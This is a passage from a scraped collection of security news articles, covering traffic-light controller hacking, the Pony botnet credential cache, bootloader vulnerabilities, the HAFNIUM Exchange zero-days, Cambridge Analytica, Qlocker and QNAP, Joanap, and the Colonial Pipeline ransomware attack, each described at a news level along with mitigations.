The Traffic light systems use a combination of 5.8GHz and 900MHz radio signals, depending on the conditions at each intersection, for wireless communication in point-to-point or point-to-multipoint configurations. The 900MHz links use ""a proprietary protocol with frequency hopping spread-spectrum (FHSS),"" but the 5.8GHz version of the proprietary protocol isn't terribly different from 802.11n.
The researchers says that anyone with a laptop and a wireless card operating on the same frequency as the wirelessly networked traffic light — in this case, 5.8 gigahertz — could access the entire unencrypted network.
Now, after gaining access, next was to communicate with one of the controllers in their target network. This was done very easily due to the fact that this system's the control boxes run VxWorks 5.5, a version which by default gets built from source with a debug port left accessible for testing.
""By sniffing packets sent between the controller and this program, we discovered that communication to the controller is not encrypted, requires no authentication, and is replayable. Using this information, we were then able to reverse engineer parts of the communication structure,"" the paper reads.
""Various command packets only differ in the last byte, allowing an attacker to easily determine remaining commands once one has been discovered. We created a program that allows a user to activate any button on the controller and then displays the results to the user. We also created a library of commands which enable scriptable attacks. We tested this code in the field and were able to access the controller remotely.""
This debug port allowed researchers to successfully turned all lights red or alter the timing of neighboring intersections — for example, to make sure someone hit all green lights on a given route.
More worrying part is the ability of a cyber criminal to perform denial-of-service (DoS) attack on controlled intersections by triggering each intersection's malfunction management unit by attempting invalid configurations, which would put the lights into a failure mode.
At last, the team called for manufacturers and operators to improve the security of traffic infrastructure. It recommended that the traffic-system administrators should not use default usernames and passwords, as well as they should stop broadcasting communications unencrypted for ""casual observers and curious teenagers"" to see.
""While traffic control systems may be built to fail into a safe state, we have shown that they are not safe from attacks by a determined adversary,"" the paper concluded.
Moreover, they also warned that devices like voting machines and even connected cars could suffer similar attacks.
"Two Million stolen Facebook, Twitter login credentials found on 'Pony Botnet' Server",https://thehackernews.com/2013/12/two-million-stolen-facebook-twitter.html,"Security researchers at Trustwave's SpiderLabs found a Netherlands-based Pony Botnet Controller Server with almost two Million usernames and passwords, stolen by cybercriminals from users of Facebook, Twitter, Google, Yahoo and other websites.
In a blog post, the researchers mentioned that after the Pony Version 1.9 Source code was made public and they found a way to get into the Botnet's Admin area, from where they collected stolen database and statistics.
The Pony Control panel, written in Russian language, indicated Facebook was the worst impacted and two Russian Social Media sites i.e. vk.com and odnoklassniki.ru, credentials were also included in the database.
It is not clear at this time that how exactly the login credentials were originally obtained, but one possibility is that, they were captured using some keyloggers or similar malware.
Statistics of stolen login credentials:
1,580,000 website login credentials stolen (including 318,121 Facebook login credentials, 21,708 Twitter accounts, 54,437 Google-based accounts and 59,549 Yahoo accounts)
320,000 email account credentials stolen
41,000 FTP account credentials stolen
3,000 Remote Desktop credentials stolen
3,000 Secure Shell account credentials stolen
'A quick glance at the Geo-location statistics above would make one think that this attack was a targeted attack on the Netherlands.' researcher wrote. .. followed by Thailand, Germany, Singapore, and Indonesia. The United States accounted for less than 2,000 stolen credentials.
Spider Labs also listed the most commonly used passwords:
123456 - used for 15,820 accounts
123456789 - used for 4,875 accounts
1234 - used for 3,135 accounts
password - used for 2,212 accounts
12345 - used for 2,094 accounts
Obviously a bad idea to keep such weak password. Your passwords are the keys to your computer and your private information. Don't give out your passwords, make sure they are not easy to guess.
To defend your system against such malware issues, keep your computer and browser up-to-date and virus-free and make sure that you have Facebook's Login Notifications and Google's 2-step verification option enabled.
LinkedIn and Facebook said they were aware of the issue and looking into it.
Mobile Bootloaders From Top Manufacturers Found Vulnerable to Persistent Threats,https://thehackernews.com/2017/09/hacking-android-bootloader-unlock.html,"Security researchers have discovered several severe zero-day vulnerabilities in the mobile bootloaders from at least four popular device manufacturers that could allow an attacker to gain persistent root access on the device.
A team of nine security researchers from the University of California Santa Barbara created a special static binary tool called BootStomp that automatically detects security vulnerabilities in bootloaders.
Since bootloaders are usually closed source and hard to reverse-engineer, performing analysis on them is difficult, especially because hardware dependencies hinder dynamic analysis.
Therefore, the researchers created BootStomp, which ""uses a novel combination of static analysis techniques and underconstrained symbolic execution to build a multi-tag taint analysis capable of identifying bootloader vulnerabilities.""
The tool helped the researchers discover six previously-unknown critical security bugs across bootloaders from HiSilicon (Huawei), Qualcomm, MediaTek, and NVIDIA, which could be exploited by attackers to unlock device bootloader, install custom malicious ROM and persistent rootkits.
Five of the vulnerabilities have already been confirmed by their respective by the chipset vendors. Researchers also found a known bug (CVE-2014-9798) in Qualcomm's bootloaders, which was previously reported in 2014, but still present and usable.
In a research paper [PDF], titled ""BootStomp: On the Security of Bootloaders in Mobile Devices,"" presented at the USENIX conference in Vancouver, the researchers explain that some of the discovered flaws even allow an attacker with root privileges on the Android operating system to execute malicious code as part of the bootloader or to perform permanent denial-of-service attacks.
According to the researchers, the vulnerabilities impact the ARM's ""Trusted Boot"" or Android's ""Verified Boot"" mechanisms that chip-set vendors have implemented to establish a Chain of Trust (CoT), which verifies the integrity of each component the system loads while booting the device.
Overview: Discovered Bootloader Vulnerabilities
The researchers tested five different bootloader implementations in Huawei P8 ALE-L23 (Huawei / HiSilicon chipset), Nexus 9 (NVIDIA Tegra chipset), Sony Xperia XA (MediaTek chipset) and two versions of the LK-based bootloader, developed by Qualcomm.
The researcher discovered five critical vulnerabilities in the Huawei Android bootloader:
An arbitrary memory write or denial of service (DoS) issue when parsing Linux Kernel's DeviceTree (DTB) stored in the boot partition.
A heap buffer overflow issue when reading the root-writable oem_info partition.
A root user's ability to write the nve and oem_info partitions, from which configuration data and memory access permissions governing the smartphone's peripherals can be read.
A memory corruption issue that could allow an attacker to install a persistent rootkit.
An arbitrary memory write bug that lets an attacker run arbitrary code as the bootloader itself.
Another flaw was discovered in NVIDIA's hboot, which operates at EL1, meaning that it has equivalent privilege on the hardware as the Linux kernel, which once compromised, can lead to an attacker gaining persistence.
The researchers also discovered a known, already patched vulnerability (CVE-2014-9798) in old versions of Qualcomm's bootloader that could be exploited to cause a denial of service situation.
The researchers reported all the vulnerabilities to the affected vendors. Huawei confirmed all the five vulnerabilities and NVIDIA is working with the researchers on a fix.
The team of researchers has also proposed a series of mitigations to both limit the attack surface of the bootloader as well as enforce various desirable properties aimed at safeguarding the security and privacy of users.
URGENT — 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange,https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html,"Microsoft has released emergency patches to address four previously undisclosed security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.
Describing the attacks as ""limited and targeted,"" Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.
The tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.
Discussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a ""highly skilled and sophisticated actor"" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.
HAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.
The three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.
To achieve this, as many as four zero-day vulnerabilities discovered by researchers from Volexity and Dubex are used as part of the attack chain —
CVE-2021-26855: A server-side request forgery (SSRF) vulnerability in Exchange Server
CVE-2021-26857: An insecure deserialization vulnerability in the Unified Messaging service
CVE-2021-26858: A post-authentication arbitrary file write vulnerability in Exchange, and
CVE-2021-27065: A post-authentication arbitrary file write vulnerability in Exchange
Although the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for ""Defense in Depth"" purposes.
Furthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can mitigate the issue by restricting untrusted connections or by using a VPN to separate the Exchange server from external access.
Microsoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.
Stating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.
""While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold,"" Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster explained in a write-up.
""From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems.""
Aside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also created a nmap plugin that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.
Given the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. Customers using a vulnerable version of Exchange Server are recommended to install the updates immediately to thwart these attacks.
""Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,"" Microsoft's Corporate Vice President of Customer Security, Tom Burt, said. ""Promptly applying today's patches is the best protection against this attack.
Microsoft issues Emergency Fix for Internet Explorer zero-day exploit,https://thehackernews.com/2013/09/microsoft-issues-emergency-fix-for_18.html,"All supported versions of Internet Explorer are vulnerable to a zero-day Exploit that is currently being exploited in targeted attacks against IE 8 and IE 9, dubbed ""CVE-2013-3893 MSHTML Shim Workaround"".
Microsoft confirmed that the flaw was unknown before the attacks and that it is already working on an official patch, meantime Microsoft released an emergency software fix for Internet Explorer (IE) Web browser.
Advisory noted that Microsoft is investigating public reports of a remote code execution vulnerability in Internet Explorer.
This issue could allow remote code execution if an affected system browses to a website containing malicious content directed towards the specific browser type. Victims could be infected despite the adoption of all necessary countermeasures due the nature of the flaw previously unknown.
The flaw that has been recently targeted by hackers during attacks is considerable serious and complicated to fix. State-sponsored hacking groups are often willing to pay hundreds of thousands of dollars for zero-day vulnerabilities in widely used software such as Internet Explorer.
In the specific case if the attacker successfully exploited the zero-day vulnerability could gain the same user rights as the current user, due this reason MS confirmed that whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.
Microsoft's advisory also says that EMET (the Enhanced Mitigation Experience Toolkit) may be used to mitigate against the vulnerability.
Facebook and Cambridge Analytica – What's Happened So Far,https://thehackernews.com/2018/03/facebook-cambridge-analytica.html,"Top Story— Facebook has just lost over $60 billion in market value over the past two days—that's more than Tesla's entire market capitalisation and almost three times that of Snapchat.
Facebook shares plunge over revelations that personal data of 50 million users was obtained and misused by British data analytics firm 'Cambridge Analytica,' who reportedly helped Donald Trump win the US presidency in 2016.
The privacy scandal that rocked the social media giant was revealed earlier this week when Chris Wylie, the 28-year-old data scientist who worked with a Cambridge University academic, turned into a whistleblower and leaked to the newspapers how poorly Facebook handles people's private information.
Wylie claims Cambridge Analytica created ""Steve Bannon's psychological warfare mindf**k tool"" that profiles citizens to predict their voting patterns based on the personal information gathered from a variety of sources and then helps political parties target voters with tailored advertisements and messages.
Since lots of things have happened since last week, we have compiled this brief article to explain what has happened so far in ""Facebook and Cambridge Analytica"" saga and how it keeps growing.
How Cambridge Analytica Collected 50 Million Facebook Users' Data
The story started four years ago when Cambridge psychologist Aleksandr Kogan approached researcher Michal Kosinski to get Facebook users data, which he had collected using a simple 'online personality quiz' app that requires users to log in using Facebook to participate.
While Kosinski refused to provide any data his app was used to collect, Cambridge paid Kogan over $800,000 to create a similar quiz app for him with an aim to collect Facebook users' profile data, including the list of pages they have ""liked.""
Kogan's personality quiz app, dubbed ""thisisyourdigitallife,"" was a hit. Although it attracted 270,000 Facebook users to take part, Facebook's APIs at the time let the app also collect a wide range of information about each authorized user's friends.
Since an average Facebook user has hundreds of friends in his/her friend-list, Kogan was able to leverage his user base of 270,000 people to collect data for about 50 million Facebook users for use in its ad-targeting work.
Stop Third-Party Apps From Using Your Facebook Data
Not only Cambridge Analytica's quiz app, there are other thousands of other apps that you might have encountered on your Facebook timeline—such as ""how you'll look in your 80s,"" ""which celebrity you look like,"" ""who'll be your Valentine this year""—that work on the same model.
All Facebook apps offer access using their Facebook account and ask you to grant the app's developer a range of information from your Facebook profile, like your name, location, email, and friends list.
Besides this, 'Login with Facebook' option that you might have seen on hundreds of thousands of websites works similarly by allowing site admins to offer one-click login/signup for easy to verify your identity.
It would be a good time now to revisit those third-party apps you have granted permission to access your Facebook data and completely revoke them if you don't want them to use your data and limit an app's permissions without entirely revoking it.
To disable such apps from accessing your data, you can follow these steps:
On the desktop computer, click the downward arrow in the top-right corner and select Settings and Apps from the menu. Here you'll see all the apps where you have logged into Facebook.
On mobile devices, open the menu(bottom-right for iOS, top-right for Android), and then select Settings → Account Settings → Apps → Logged in with Facebook.
For entirely revoking any app, just tap on the remove button (cross icon) next to that app. You can also limit any app's permission by clicking the edit button (pencil icon), next to the cross icon, to view each app's settings.
From here, you can revoke specific permissions by de-selecting the checkmark next to each data point.
Facebook Founder Mark Zuckerberg Apologizes For the Cambridge Analytica Scandal
Today in an interview with CNN's Laurie Segall, Facebook founder Mark Zuckerberg apologized for the social media giant's failure to prevent privacy of its users.
""This was a major breach of trust, and I'm really sorry this happened,"" Zuckerberg told Laurie.
While addressing the Cambridge Analytica scandal, Zuckerberg acknowledged that it was a huge mistake to allow third-party developers to access users' data and blindly trust that Cambridge Analytica and other companies involved in data harvesting would actually delete that data just because Facebook has asked them to.
""That ... is probably the biggest mistake that we made here,""
Zuckerberg pledged to solve all the problems and safeguard users' privacy, explaining how the company has already changed its policies after 2014 to prevent abuse of Facebook's APIs.
""Our responsibility now is to make sure this doesn't happen again,"" Zuck assured its customers and shareholders across the world who are furious after knowing about the Cambridge Analytica scandal.
During the interview, Zuckerberg promised to conduct a ""full forensic audit"" of the platform very soon to find which 3rd-party apps may have gained access to user data without their full consent and would notify everyone whose data was improperly used.
Mark Zuckerberg Says It's Time to Regulate Tech Firms
Some analysts believe that stricter government regulations are required to protect consumers' privacy over social media companies.
Since social media is playing an essential role in the world, Zuckerberg says he believes it's time to impose more regulations on technology companies, but he also recommends Artificial Intelligence as a better tool to regulate such a rapidly growing community of 2 billion people all over the world
Besides this, Facebook has also planned to have more than 20,000 employees to closely monitor security and privacy operations by the end of this year.
Facebook Faces International Investigation Over Personal Data Use
Facebook is in trouble with governments across the world after this whole Cambridge Analytica mess.
Following reports of the transfer of personal information of over 50 million users from Facebook to data-mining firm Cambridge Analytica, Facebook is facing probes by some countries including the United States, European Union, UK, Israel, India, and Canada.
The United States' Federal Trade Commission (FTC) has started investigating whether or not the use of personal data from over 50 million users by Cambridge Analytica violated a consent decree Facebook signed with the agency in 2011.
The European Commission has also asked data protection authorities to investigate Facebook's data leak to Cambridge Analytica, and if the commission finds Facebook in breach of data protection laws, it could levy fines on the company.
The social networking site is also facing a separate probe by the U.K. government, who is pursuing a warrant to conduct its on-site investigation to determine whether Cambridge Analytica still has the information, which the company said has been deleted.
Israeli Justice Ministry has also informed Facebook that it is opening an ""administrative investigation"" into Facebook ""and the possibility of additional violations of Israelis' personal information,"" the ministry said Thursday.
Cambridge Analytica CEO Suspended After Undercover Recordings Released
Cambridge Analytica has suspended its CEO from the research firm's board of directors on Tuesday following an undercover video was aired which showed him discussing the use of bribes and prostitutes to sway political elections.
The board said that Alexander Nix would be suspended pending a ""full, independent investigation,"" adding that ""In the view of the Board, Mr. Nix's recent comments secretly recorded by Channel 4 and other allegations do not represent the values or operations of the firm and his suspension reflects the seriousness with which we view this violation.""
In an uncover video published by Channel 4 News in London on Monday, Nix found discussing how his firm is engaged in dirty tricks for political clients, like recording videos of operatives offering their opponents bribes.
Nix also told a journalist, who posed as a potential Sri Lankan client, that his firm could also send ""some girls around to the candidate's house"" to put the candidate in a compromising position.
However, Cambridge has denied engaging in any of such tactics Nix described in the video.
Cambridge Analytica mess has become one of the biggest scandals in tech right now, and it is becoming messier with each passing day, which could have enormous implications not only for Facebook but for every other online company out there that sells user data for a living.
Facebook shares continued falling and dropped today by 2.66% to $164.89 as of the time of this writing.
New QNAP NAS Flaws Exploited In Recent Ransomware Attacks - Patch It!,https://thehackernews.com/2021/04/new-qnap-nas-flaws-exploited-in-recent.html,"A new ransomware strain called ""Qlocker"" is targeting QNAP network attached storage (NAS) devices as part of an ongoing campaign and encrypting files in password-protected 7zip archives.
First reports of the infections emerged on April 20, with the adversaries behind the operations demanding a bitcoin payment (0.01 bitcoins or about $500.57) to receive the decryption key.
In response to the ongoing attacks, the Taiwanese company has released an advisory prompting users to apply updates to QNAP NAS running Multimedia Console, Media Streaming Add-on, and HBS 3 Hybrid Backup Sync to secure the devices from any attacks.
""QNAP strongly urges that all users immediately install the latest Malware Remover version and run a malware scan on QNAP NAS,"" the company said. ""The Multimedia Console, Media Streaming Add-on, and Hybrid Backup Sync apps need to be updated to the latest available version as well to further secure QNAP NAS from ransomware attacks.""
Patches for the three apps were released by QNAP over the last week. CVE-2020-36195 concerns an SQL injection vulnerability in QNAP NAS running Multimedia Console or Media Streaming Add-on, successful exploitation of which could result in information disclosure. On the other hand, CVE-2021-28799 relates to an improper authorization vulnerability affecting QNAP NAS running HBS 3 Hybrid Backup Sync that could be exploited by an attacker to log in to a device.
But it appears that Qlocker is not the only strain that's being used to encrypt NAS devices, what with threat actors deploying another ransomware named ""eCh0raix"" to lock sensitive data. Since its debut in July 2019, the eCh0raix gang is known for going after QNAP storage appliances by leveraging known vulnerabilities or carrying out brute-force attacks.
QNAP is also urging users to the latest version of Malware Remover to perform a scan as a safety measure while it's actively working on a solution to remove malware from infected devices.
""Users are advised to modify the default network port 8080 for accessing the NAS operating interface,"" the company recommended, adding ""the data stored on NAS should be backed up or backed up again utilizing the 3-2-1 backup rule, to further ensure data integrity and security.""
"Apple's New MacBook Disconnects Microphone ""Physically"" When Lid is Closed",https://thehackernews.com/2018/10/apple-macbook-microphone.html,"Apple introduces a new privacy feature for all new MacBooks that ""at some extent"" will prevent hackers and malicious applications from eavesdropping on your conversations.
Apple's custom T2 security chip in the latest MacBooks includes a new hardware feature that physically disconnects the MacBook's built-in microphone whenever the user closes the lid, the company revealed yesterday at its event at the Brooklyn Academy of Music in New York.
Though the new T2 chip is already present in the 2018 MacBook Pro models launched earlier this year, this new feature got unveiled when Apple launched the new Retina MacBook Air and published a full security guide for T2 Chip yesterday.
""This disconnect is implemented in hardware alone, and therefore prevents any software, even with root or kernel privileges in macOS, and even the software on the T2 chip, from engaging the microphone when the lid is closed,"" Apple explained in the guide [PDF].
The tech giant further added that ""the camera is not disconnected in hardware because its field of view is completely obstructed with the lid closed.""
Is It Helpful? Not Much
This feature is excellent as it makes impossible for malware to access your built-in microphone when the lid is closed, but honestly, it doesn't help when you are most vulnerable, i.e. while working.
Mac users will be still prone to malware, like the infamous FruitFly malware, that can secretly turn on your MacBook camera and microphone to record video and audio when your laptop lid is not closed.
In my opinion, such physical hardware disconnect feature would be more helpful if manufacturers could offer a manual switch using which users can turn on or off their device's microphone or camera, whenever required.
More About Apple T2 Security Chip
Anyway, besides this, Apple's T2 chip also offers other security features that are impressive like including the Secure Enclave coprocessor that protects your MacBook's encryption keys, fingerprint data, and secure boot features.
Along with the security and convenience of Touch ID, MacBooks with the T2 chip provide ""a level of privacy and security protections never before seen on Mac,"" according to Apple.
The T2 chip offers some non-security features as well, like an image signal processor that enables enhanced tone mapping, controls the ambient sensor, the system management controller (SMC), white balancing to the FaceTime HD camera, Apple video encoder, audio controller, and enables ""Hey Siri.""
Hackers can steal Windows Phone passwords using Wi-Fi vulnerability,https://thehackernews.com/2013/08/hacking-windows-phone-wifi-tool-download.html,"Microsoft has warned that a vulnerability in Windows Phone operating systems could allow hackers to access your login credentials.
The vulnerability resides in a Wi-Fi authentication scheme known as PEAP-MS-CHAPv2, which Windows Phones use to access wireless networks protected by version 2 of the Wi-Fi Protected Access protocol.
Cryptographic weaknesses in the technology can allow attackers to gain access to users encrypted domain credentials. These credentials could potentially give the attackers access to sensitive corporate networks.
The bulletin, advisory 2876146, says:
To exploit this issue, an attacker controlled system could pose as a known Wi-Fi access point, causing the targeted device to automatically attempt to authenticate with the access point, and in turn allowing the attacker to intercept the victim's encrypted domain credentials. An attacker could then exploit cryptographic weaknesses in the PEAP-MS-CHAPv2 protocol to obtain the victim's domain credentials. Those credentials could then be re-used to authenticate the attacker to network resources, and the attacker could take any action that the user could take on that network resource.
Microsoft does not intend to patch this vulnerability. Microsoft has not received any reports of this vulnerability being used to steal corporate data, passwords or breach a network to date. Rather, it simply advises users of Windows phones to require a certificate before joining wireless networks, and includes instructions for enforcing this in the phone settings.
Security Flaw Left Major Banking Apps Vulnerable to MiTM Attacks Over SSL,https://thehackernews.com/2017/12/mitm-ssl-pinning-hostname.html,"A team of security researchers has discovered a critical implementation flaw in major mobile banking applications that left banking credentials of millions of users vulnerable to hackers.
The vulnerability was discovered by researchers of the Security and Privacy Group at the University of Birmingham, who tested hundreds of different banking apps—both iOS and Android—and found that several of them were affected by a common issue, leaving their users vulnerable to man-in-the-middle attacks.
The affected banking apps include HSBC, NatWest, Co-op, Santander, and Allied Irish bank, which have now been updated after researchers reported them of the issue.
According to a research paper [PDF] published by researchers, vulnerable applications could have allowed an attacker, connected to the same network as the victim, to intercept SSL connection and retrieve the user's banking credentials, like usernames and passwords/pincodes—even if the apps are using SSL pinning feature.
SSL pinning is a security feature that prevents man-in-the-middle (MITM) attacks by enabling an additional layer of trust between the listed hosts and devices.
When implemented, SSL pinning helps to neutralize network-based attacks wherein attackers could attempt to use valid certificates issued by rogue certification authorities.
""If a single CA acted maliciously or were compromised, which has happened before, valid certificates for any domain could be generated allowing an attacker to Man-in-the-Middle all apps trusting that CA certificate,"" the researchers wrote in their paper.
However, there are two key parts to verify an SSL connection—the first (authentication) is to verify whether the certificate is from a trusted source and the second (authorization) is to make sure the server you are connecting to presents the right certificate.
Researchers found that due to lack of hostname verification, several banking applications were not checking if they connected to a trusted source.
Verifying a hostname ensures the hostname in the URL to which the banking app connects matches the hostname in the digital certificate that the server sends back as part of the SSL connection.
""TLS misconfiguration vulnerabilities are clearly common; however none of the existing frameworks will detect that a client pins a root or intermediate certificate, but fails to check the hostname in the leaf,"" the paper reads.
Besides this issue, the researchers also detailed an ""in-app phishing attack"" affecting Santander and Allied Irish Banks, which could have allowed attackers to hijack part of the victim's screen while the app was running and use it to phish for the victim's login credentials.
To test this vulnerability in hundreds of banking apps quickly and without requiring to purchase certificates, researchers created a new automated tool, dubbed Spinner.
Spinner leverages Censys IoT search engine for finding certificate chains for alternate hosts that only differ in the leaf certificate.
""Given the certificate for a target domain, the tool queries for certificate chains for alternate hosts that only differ in the leaf certificate. The tool then redirects the traffic from the app under test to a website which has a certificate signed by the same CA certificate, but of course a different hostname (Common Name),"" the researchers explain.
""If the connection fails during the establishment phase then we know the app detected the wrong hostname. Whereas, if the connection is established and encrypted application data is transferred by the client before the connection fails then we know the app has accepted the hostname and is vulnerable.""
The trio, Chris McMahon Stone, Tom Chothia, and Flavio D. Garcia, worked with the National Cyber Security Centre (NCSC) to notify all affected banks, which then resolved the issues before they publicly disclosed their research this week.
FBI Mapping 'Joanap Malware' Victims to Disrupt the North Korean Botnet,https://thehackernews.com/2019/01/north-korea-hacker.html,"The United States Department of Justice (DoJ) announced Wednesday its effort to ""map and further disrupt"" a botnet tied to North Korea that has infected numerous Microsoft Windows computers across the globe over the last decade.
Dubbed Joanap, the botnet is believed to be part of ""Hidden Cobra""—an Advanced Persistent Threat (APT) actors' group often known as Lazarus Group and Guardians of Peace and backed by the North Korean government.
Hidden Cobra is the same hacking group that has been allegedly associated with the WannaCry ransomware menace in 2016, the SWIFT Banking attack in 2016, as well as Sony Motion Pictures hack in 2014.
Dates back to 2009, Joanap is a remote access tool (RAT) that lands on a victim's system with the help an SMB worm called Brambul, which crawls from one computer to another by brute-forcing Windows Server Message Block (SMB) file-sharing services using a list of common passwords.
Once there, Brambul downloads Joanap on the infected Windows computers, effectively opening a backdoor for its masterminds and giving them remote control of the network of infected Windows computers.
If You Want to Beat Them, Then First Join Them
Interestingly, the computers infected by Joanap botnet don't take commands from a centralized command-and-control server; instead it relies on peer-to-peer (P2P) communications infrastructure, making every infected computer a part of its command and control system.
Even though Joanap is currently being detected by many malware protection systems, including Windows Defender, the malware's peer-to-peer (P2P) communications infrastructure still leaves large numbers of infected computers connected to the Internet.
So to identify infected hosts and take down the botnet, the FBI and the Air Force Office of Special Investigations (AFOSI) obtained legal search warrants that allowed the agencies to join the botnet by creating and running ""intentionally infected"" computers mimicking its peers to collect both technical and ""limited"" identifying information in an attempt to map them, the DoJ said in its press release.
""While the Joanap botnet was identified years ago and can be defeated with antivirus software, we identified numerous unprotected computers that hosted the malware underlying the botnet,"" said U.S. Attorney Nicola T. Hanna.
""The search warrants and court orders announced today as part of our efforts to eradicate this botnet are just one of the many tools we will use to prevent cybercriminals from using botnets to stage damaging computer intrusions.""
The collected information about computers infected with the Joanap malware included IP addresses, port numbers, and connection timestamps which allowed the FBI and AFOSI to build a map of the current Joanap botnet.
The agencies are now notifying victims of the presence of Joanap on their infected computers through their Internet Service Providers (ISPs) and even sending personal notifications to people who don't have a router or firewall protecting their systems.
The US Justice Department and FBI will also coordinate the notification of overseas victims of the Joanap malware by sharing the data with the government of other countries.
The efforts to disrupt the Joanap botnet began after the United States unsealed charges against a North Korean computer programmer named Park Jin Hyok in September last year for his role in masterminding the Sony Pictures and WannaCry ransomware attacks.
Joanap and Brambul were also recovered from computers of the victims of the campaigns listed in the Hyok's September indictment, suggesting that he aided the development of the Joanap botnet.
U.S. Declares Emergency in 17 States Over Fuel Pipeline Cyber Attack,https://thehackernews.com/2021/05/us-declares-emergency-in-17-states-over.html,"The ransomware attack against Colonial Pipeline's networks has prompted the U.S. Federal Motor Carrier Safety Administration (FMCSA) to issue a regional emergency declaration in 17 states and the District of Columbia (D.C.).
The declaration provides a temporary exemption to Parts 390 through 399 of the Federal Motor Carrier Safety Regulations (FMCSRs), allowing alternate transportation of gasoline, diesel, and refined petroleum products to address supply shortages stemming from the attack.
""Such [an] emergency is in response to the unanticipated shutdown of the Colonial pipeline system due to network issues that affect the supply of gasoline, diesel, jet fuel, and other refined petroleum products throughout the Affected States,"" the directive said. ""This Declaration addresses the emergency conditions creating a need for immediate transportation of gasoline, diesel, jet fuel, and other refined petroleum products and provides necessary relief.""
The states and jurisdictions affected by the pipeline shut down and included in the Emergency Declaration are Alabama, Arkansas, District of Columbia, Delaware, Florida, Georgia, Kentucky, Louisiana, Maryland, Mississippi, New Jersey, New York, North Carolina, Pennsylvania, South Carolina, Tennessee, Texas, and Virginia.
The exemptions, which aim to alleviate any supply disruptions that may arise as a result of Colonial halting its pipeline operations, are expected to be in effect until the end of the emergency or June 8, 2021, 11:59 p.m., whichever is earlier.
FBI Confirms DarkSide Ransomware
The development comes as the U.S. Federal Bureau of Investigation (FBI) confirmed the shutdown of one of the country's largest pipelines over the weekend was orchestrated by Darkside ransomware. The cyberattack forced the company to shut down 5,500 miles of fuel pipeline from the Texas city of Houston to New York harbor, raising concerns about the vulnerability of the U.S. energy infrastructure to cyberattacks.
""Colonial Pipeline is continuing to work in partnership with third-party cybersecurity experts, law enforcement, and other federal agencies to restore pipeline operations quickly and safely,"" Colonial Pipeline said in a statement. ""While this situation remains fluid and continues to evolve, the Colonial operations team is executing a plan that involves an incremental process that will facilitate a return to service in a phased approach.""
While the U.S. government on Monday said there was no evidence to imply that Russia was involved in the Colonial Pipeline ransomware attack, the operators of the DarkSide ransomware issued a statement on their dark web extortion site, pledging it intends to vet the companies its affiliates are targeting going forward to ""avoid social consequences in the future.""
""We are apolitical, we do not participate in geopolitics, do not need to tie us with a defined government and look for other our motives,"" the cybercrime gang said, adding, ""Our goal is to make money, and not creating problems for society.""
DarkSide as Carbon Spider's Ransomware campaign
The adversary, which is alleged to have leaked data pertaining to at least 91 organizations since commencing operations in August 2020, functions as a ransomware-as-a-service (RaaS) scheme, in which partners are roped in to expand the criminal enterprise by breaching corporate networks and deploying the ransomware, while the core developers take charge of maintaining the malware and payment infrastructure. Affiliates typically receive 60% to 70% of the proceeds, and the developers earn the rest.
Among the victims whose internal data was published on the DarkSide's data leak site are other oil and gas companies such as Forbes Energy Services and Gyrodata, both of which are based in Texas. According to Crowdstrike, DarkSide is believed to be the handiwork of a financially-motivated threat actor called Carbon Spider (aka Anunak, Carbanak, or FIN7), whose high-level manager and systems administrator was recently sentenced to 10 years in prison in the U.S.
""The DarkSide group is a relatively new player in the game of ransomware. Despite being a new group, though, the DarkSide team has already built itself quite a reputation for making their operations more professional and organized,"" Cybereason researchers said last month. ""The group has a phone number and even a help desk to facilitate negotiations with victims, and they are making a great effort at collecting information about their victims – not just technical information about their environment, but more general information about the company itself, like the organization's size and estimated revenue.""
Stating that the RaaS variant is the latest product to join the growing trend of ransomware professionalization, cybersecurity firm Digital Shadows called out DarkSide's history of issuing corporate-style press releases on its Tor domain, labeling its business model a ""ransomware-as-a-corporation"" (RaaC).
The Colonial Pipeline incident is the latest cyberattack to confront the U.S. government in recent months, following the SolarWinds hacks by Russian intelligence operatives and the exploitation of Microsoft Exchange Server vulnerabilities by Chinese threat actors.
""To take down extensive operations like the Colonial pipeline reveals a sophisticated and well-designed cyberattack,"" Check Point's Head of Threat Intelligence, Lotem Finkelsteen, said. ""This attack also requires a proper time frame to allow lateral movement and data exhilaration. The Darkside is known to be part of a trend of ransomware attacks that involve systems the cyber community rarely sees involved in the compromised network, like ESXi servers. This leads to suspicions that ICS network (critical infrastructure systems) were involved.""
